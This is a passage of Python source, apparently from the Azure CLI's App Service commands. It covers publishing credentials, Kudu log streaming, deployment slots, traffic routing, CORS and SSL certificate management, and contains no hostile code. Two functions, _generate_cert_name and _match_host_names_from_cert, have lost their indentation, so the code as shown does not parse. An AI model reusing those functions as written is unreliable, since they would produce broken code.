    # prompt interactively when no password was supplied on the command line
    if password is None:
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    deployment_user.publishing_password = password
    return client.update_publishing_user(deployment_user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the app's publishing credentials, resolving the long-running poller."""
    poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'begin_list_publishing_credentials', slot)
    return poller.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Return publish profiles as a list of dicts, or the raw XML when xml=True."""
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
    # the operation streams the profile XML in byte chunks; reassemble it
    full_xml = ''
    for f in content:
        full_xml += f.decode()
    if not xml:
        profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
        converted = []
        # a single profile parses to a dict rather than a list; normalize
        if not isinstance(profiles, list):
            profiles = [profiles]
        for profile in profiles:
            new = {}
            for key in profile:
                # strip the leading '@' xmltodict put in for attributes
                new[key.lstrip('@')] = profile[key]
            converted.append(new)
        return converted
    # raw XML output: force tsv so the XML isn't wrapped by the JSON formatter
    cmd.cli_ctx.invocation.data['output'] = 'tsv'
    return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle the DOCKER_ENABLE_CI app setting and report the resulting CD webhook URL."""
    new_settings = ["DOCKER_ENABLE_CI=" + enable]
    update_app_settings(cmd, resource_group_name, name, new_settings, slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
    """Report whether container CI is enabled and, if so, the docker webhook URL."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    docker_enabled = any(s['name'] == 'DOCKER_ENABLE_CI' and s['value'] == 'true'
                         for s in settings)
    cd_settings = {'DOCKER_ENABLE_CI': docker_enabled}
    if docker_enabled:
        credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
        cd_settings['CI_CD_URL'] = (credentials.scm_uri + '/docker/hook') if credentials else ''
    return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
    """Open the app's URL in the default browser; optionally start streaming its logs."""
    open_page_in_browser(_get_url(cmd, resource_group_name, name, slot))
    if logs:
        get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
    """Build the browsable URL of an app, preferring https when any hostname has SSL enabled."""
    SslState = cmd.get_models('SslState')
    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    host = site.enabled_host_names[0]  # picks the custom domain URL incase a domain is assigned
    has_ssl = any(h.ssl_state != SslState.disabled for h in site.host_name_ssl_states)
    scheme = 'https' if has_ssl else 'http'
    return scheme + '://' + host
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure application/web-server logging, detailed errors and failed-request tracing.

    Options left as None are not changed; the string 'off' disables the
    corresponding log category.
    """
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
                                       HttpLogsConfig, FileSystemHttpLogsConfig,
                                       EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location
    application_logs = None
    if application_logging:
        fs_log = None
        blob_log = None
        # 'off' forces level to False (disabled); otherwise an unset level defaults to True
        level = level if application_logging != 'off' else False
        level = True if level is None else level
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
        if application_logging in ['azureblobstorage', 'off']:
            blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
                                                             sas_url=None)
        application_logs = ApplicationLogsConfig(file_system=fs_log,
                                                 azure_blob_storage=blob_log)
    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be impelemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
                                   slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Return the diagnostic logs configuration for a web app (or slot)."""
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'get_diagnostic_logs_configuration', slot)
    return result
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Show the Kudu deployment log for one deployment.

    When deployment_id is given, fetches that deployment's log directly; otherwise
    lists all deployments, sorts by start_time descending, and uses the newest
    entry's 'log_url'. Returns the parsed JSON log, or [] when nothing is found.
    Raises CLIError on any non-200 response from the SCM site.
    """
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    # Kudu uses basic auth with the site's publishing credentials.
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # No id supplied: find the most recent deployment and use its log_url.
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))
        sorted_logs = sorted(
            response.json(),
            key=lambda x: x['start_time'],
            reverse=True
        )
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')
    if deployment_log_url:
        response = requests.get(deployment_log_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployment_log_url, response.status_code, response.reason))
        return response.json()
    return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List all deployments recorded by the Kudu (SCM) site.

    Returns the parsed JSON array of deployment entries, or [] when empty.
    Raises CLIError when the deployments endpoint does not answer with HTTP 200.
    """
    import urllib3
    import requests
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    response = requests.get(deployment_log_url, headers=headers)
    if response.status_code != 200:
        # Bug fix: report the URL that was actually queried (this previously
        # reported scm_url even though the request went to deployment_log_url).
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            deployment_log_url, response.status_code, response.reason))
    return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable (default target 'production') or disable auto-swap on a deployment slot."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    if disable:
        site_config.auto_swap_slot_name = ''
    else:
        site_config.auto_swap_slot_name = auto_swap_slot or 'production'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
    """List deployment slots, trimming slot names and exposing the plan name.

    Each returned slot has its 'name' reduced to the bare slot name and gains an
    'app_service_plan' attribute in place of 'server_farm_id'.
    """
    client = web_client_factory(cmd.cli_ctx)
    result = []
    for s in client.web_apps.list_slots(resource_group_name, webapp):
        # Names come back as 'site/slot'; keep only the slot portion.
        s.name = s.name.split('/')[-1]
        setattr(s, 'app_service_plan', parse_resource_id(s.server_farm_id)['name'])
        del s.server_farm_id
        result.append(s)
    return result
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
    """Swap, preview, or reset a deployment-slot swap.

    action: 'swap' performs the swap (returns a poller), 'preview' applies the
    target slot's config to the source, anything else resets both slots' config.
    """
    client = web_client_factory(cmd.cli_ctx)
    # preserve_vnet arrives as the strings 'true'/'false'; default to 'true' when omitted,
    # then convert to a real boolean for the SDK model.
    preserve_vnet_flag = (preserve_vnet if preserve_vnet is not None else 'true') == 'true'
    CsmSlotEntity = cmd.get_models('CsmSlotEntity')
    slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=preserve_vnet_flag)
    if action == 'swap':
        return client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
    if action == 'preview':
        if slot is None:
            return client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
        return client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
    # reset: clear the swapped configuration on both source and target slots
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None
def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete a deployment slot from the given web app."""
    client = web_client_factory(cmd.cli_ctx)
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Replace the app's traffic ramp-up rules.

    distribution: iterable of '<slot>=<percentage>' strings; an empty iterable
    clears all rules. Returns the resulting list of RampUpRule objects.
    Raises CLIError when the app does not exist.
    """
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    # Split 'myapp.azurewebsites.net' into ('myapp', '.azurewebsites.net') so the
    # slot's host name can be built as 'myapp-<slot>.azurewebsites.net'.
    host_name_split = site.default_host_name.split('.', 1)
    host_name_suffix = '.' + host_name_split[1]
    host_name_val = host_name_split[0]
    configs.experiments.ramp_up_rules = []
    for r in distribution:
        slot, percentage = r.split('=')
        action_host_name_slot = host_name_val + "-" + slot
        configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
                                                            reroute_percentage=float(percentage),
                                                            name=slot))
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
    return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
    """Return the app's current ramp-up (traffic routing) rules."""
    return get_site_configs(cmd, resource_group_name, name).experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all traffic ramp-up rules by setting an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the app's CORS allow-list and return the updated CORS settings."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    updated = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return updated.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove the given origins from the CORS allow-list; with no origins, clear it entirely."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            remaining = [o for o in (configs.cors.allowed_origins or []) if o not in allowed_origins]
            configs.cors.allowed_origins = remaining
        else:
            configs.cors.allowed_origins = []
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Show the CORS settings configured on the app (or slot)."""
    site_configs = get_site_configs(cmd, resource_group_name, name, slot)
    return site_configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Tail the live log stream from the Kudu /logstream endpoint until Ctrl+C.

    provider: optional sub-path appended to the stream URL to narrow the source.
    This function never returns normally; it blocks forever so Ctrl+C can end
    the command while a daemon thread does the actual streaming.
    """
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    # Stream on a daemon thread so the process can exit immediately on Ctrl+C.
    t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    t.daemon = True
    t.start()
    while True:
        time.sleep(100)  # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the zipped site logs from the Kudu /dump endpoint into log_file."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    dump_url = '{}/dump'.format(scm_url.rstrip('/'))
    creds = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(dump_url, creds[0], creds[1], log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return (username, password) publishing credentials for the app or slot."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name,
                                     'begin_list_publishing_credentials', slot)
    creds = poller.result()
    return creds.publishing_user_name, creds.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """Fetch logs from a Kudu endpoint with basic auth.

    With log_file set, downloads the body to that file in 1KB chunks;
    otherwise streams each chunk to the logger (stdout) as it arrives.
    Raises CLIError when the endpoint does not respond with HTTP 200.
    """
    import certifi
    import urllib3
    try:
        # Prefer pyOpenSSL for TLS when it is installed; purely optional.
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False  # stream the body instead of buffering it all in memory
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download logs
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        std_encoding = sys.stdout.encoding
        for chunk in r.stream():
            if chunk:
                # Extra encode() and decode for stdout which does not support 'utf-8'
                logger.warning(chunk.decode(encoding='utf-8', errors='replace')
                               .encode(std_encoding, errors='replace')
                               .decode(std_encoding, errors='replace')
                               .rstrip('\n\r'))  # each line of log has CRLF.
    r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
    """Upload a PFX certificate file to the app's resource group.

    The certificate is named from its thumbprint, hosting environment,
    location, and resource group, then created/updated via the ARM API.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    # Bug fix: the file handle was previously opened without a context manager
    # and never closed; use `with` so it is always released.
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    """Decrypt the .pfx file and return the certificate's SHA1 thumbprint (colons stripped)."""
    # Bug fix: the PFX file was previously opened inline and the handle leaked;
    # read it inside a context manager instead.
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
    cert = p12.get_certificate()
    # SHA1 is the digest App Service uses to identify certificates.
    digest_algorithm = 'sha1'
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List all certificates in the given resource group."""
    return web_client_factory(cmd.cli_ctx).certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
    """Show a single certificate by name from the resource group."""
    return web_client_factory(cmd.cli_ctx).certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the first certificate in the resource group matching the thumbprint.

    Raises CLIError when no certificate with that thumbprint exists.
    """
    client = web_client_factory(cmd.cli_ctx)
    for cert in client.certificates.list_by_resource_group(resource_group_name):
        if cert.thumbprint == certificate_thumbprint:
            return client.certificates.delete(resource_group_name, cert.name)
    raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Import a certificate stored in Key Vault into the web app's resource group.

    key_vault may be a vault name (resolved within the current subscription) or a
    full Key Vault resource ID. Logs a warning and returns None when the vault
    cannot be found; logs (but does not fail) when the App Service service
    principal's Key Vault permissions cannot be verified.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = None
    if not is_valid_resource_id(key_vault):
        # Treat the argument as a vault name and search the current subscription.
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        key_vaults = kv_client.vaults.list_by_subscription()
        for kv in key_vaults:
            if key_vault == kv.name:
                kv_id = kv.id
                break
    else:
        kv_id = key_vault
    if kv_id is None:
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check if certificate is an app service certificate, in the same or a different
    # subscription
    kv_secret_name = None
    cloud_type = cmd.cli_ctx.cloud.name
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if cloud_type.lower() == PUBLIC_CLOUD.lower():
        if kv_subscription.lower() != subscription_id.lower():
            # The vault lives in a different subscription: list App Service
            # certificate orders with a client scoped to that subscription.
            diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
                                                               subscription_id=kv_subscription)
            ascs = diff_subscription_client.app_service_certificate_orders.list()
        else:
            ascs = client.app_service_certificate_orders.list()
        kv_secret_name = None
        for asc in ascs:
            if asc.name == key_vault_certificate_name:
                kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
    # if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
    if not kv_secret_name:
        kv_secret_name = key_vault_certificate_name
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)
    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
    return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for a custom hostname.

    Validates that the app exists, the plan is not Free/Shared, and the hostname
    is already bound to the app, then creates the certificate. Because the backend
    may return 202 with a polling URL, a manual poll loop (up to ~2 minutes) is
    used instead of the SDK's LRO machinery.
    """
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name, slot_text))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    easy_cert_def = Certificate(location=location, canonical_name=hostname,
                                server_farm_id=server_farm_id, password='')
    # TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
    try:
        return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
                                                    certificate_envelope=easy_cert_def)
    except Exception as ex:
        # A 202 with a Location header means creation is in progress: poll it manually.
        poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
        if ex.response.status_code == 202 and poll_url:
            r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            poll_timeout = time.time() + 60 * 2  # 2 minute timeout
            while r.status_code != 200 and time.time() < poll_timeout:
                time.sleep(5)
                r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            if r.status_code == 200:
                try:
                    return r.json()
                except ValueError:
                    # Body was not JSON; return the raw text instead.
                    return r.text
            logger.warning("Managed Certificate creation in progress. Please use the command "
                           "'az webapp config ssl show -g %s --certificate-name %s' "
                           " to view your certificate once it is created", resource_group_name, hostname)
            return
        raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
    """Return True if the Microsoft.Azure.WebSites service principal has the
    'Get' secret permission on the Key Vault's access policies.

    Returns False when the vault is in a different subscription (cannot check)
    or when no matching access policy is found.
    """
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription = get_subscription_id(cmd.cli_ctx)
    # Cannot check if key vault is in another subscription
    if subscription != key_vault_subscription:
        return False
    kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
    vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # Check for Microsoft.Azure.WebSites app registration
    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
                for perm in policy.permissions.secrets:
                    if perm == "Get":
                        return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """Patch a single host name's SSL binding (state + cert thumbprint) on the site.

    Sends a minimal Site payload containing only the host_name_ssl_states entry
    (with to_update=True), plus the required location/tags.
    """
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
                                                                 ssl_state=ssl_state,
                                                                 thumbprint=thumbprint,
                                                                 to_update=True)],
                          location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
                                   slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind or unbind a certificate (by thumbprint) to the app's host names.

    Searches for the certificate first in the plan's resource group, then in the
    app's resource group. For a single non-wildcard cert host name, updates that
    binding directly; otherwise matches cert host names (incl. wildcards) against
    the app's host names and updates each. Raises ResourceNotFoundError when the
    app or certificate is missing.
    """
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
    # Certificates normally live in the App Service plan's resource group.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
    found_cert = None
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            found_cert = webapp_cert
    if not found_cert:
        # Fall back to the app's own resource group.
        webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
        for webapp_cert in webapp_certs:
            if webapp_cert.thumbprint == certificate_thumbprint:
                found_cert = webapp_cert
    if found_cert:
        if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               found_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
        for h in to_update:
            _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                        h, ssl_type, certificate_thumbprint, slot)
        return show_webapp(cmd, resource_group_name, name, slot)
    raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind a certificate to the app using SNI ('SNI') or IP-based SSL."""
    SslState = cmd.get_models('SslState')
    state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Remove the SSL binding for the certificate with the given thumbprint."""
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
    """Resolves runtime stack display names (e.g. 'node|6.1', 'php|5.5') to stack
    entries carrying a 'setter' that applies the stack's config to a site."""
    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux  # True -> Linux stacks, False -> Windows stacks
        self._stacks = []  # lazily-populated cache of stack dicts
    @staticmethod
    def remove_delimiters(runtime):
        """Normalize a runtime string so both '|' and ':' delimiters become '|'."""
        import re
        # delimiters allowed: '|', ':'
        if '|' in runtime:
            runtime = re.split('[|]', runtime)
        elif ':' in runtime:
            runtime = re.split('[:]', runtime)
        else:
            runtime = [runtime]
        return '|'.join(filter(None, runtime))
    def resolve(self, display_name):
        """Return the stack dict whose displayName matches (case-insensitive), else None."""
        self._load_stacks_hardcoded()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)
    @property
    def stacks(self):
        # All known stacks for the configured OS, loading them on first access.
        self._load_stacks_hardcoded()
        return self._stacks
    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Apply the stack's config key/values directly as site_config attributes."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
